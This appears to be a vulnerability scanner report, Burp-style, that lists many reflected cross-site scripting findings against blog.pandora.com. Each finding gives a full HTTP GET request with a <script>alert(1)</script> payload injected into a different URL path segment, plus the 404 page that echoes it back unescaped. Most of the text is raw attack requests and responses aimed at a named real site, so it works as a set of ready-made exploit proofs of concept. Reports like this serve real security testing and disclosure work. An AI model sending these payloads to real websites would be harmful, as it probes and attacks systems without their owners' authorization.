This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 332
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)</script>1733790e5e0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)</script>f3dc42bdead was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab3b98<script>alert(1)</script>f3dc42bdead/archives/2005/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)</script>8a7f5560974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9f14e<script>alert(1)</script>8a7f5560974/2005/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)</script>d8b652c75fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200585944<script>alert(1)</script>d8b652c75fe/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)</script>a2e5dc60e78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)</script>a2e5dc60e78/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
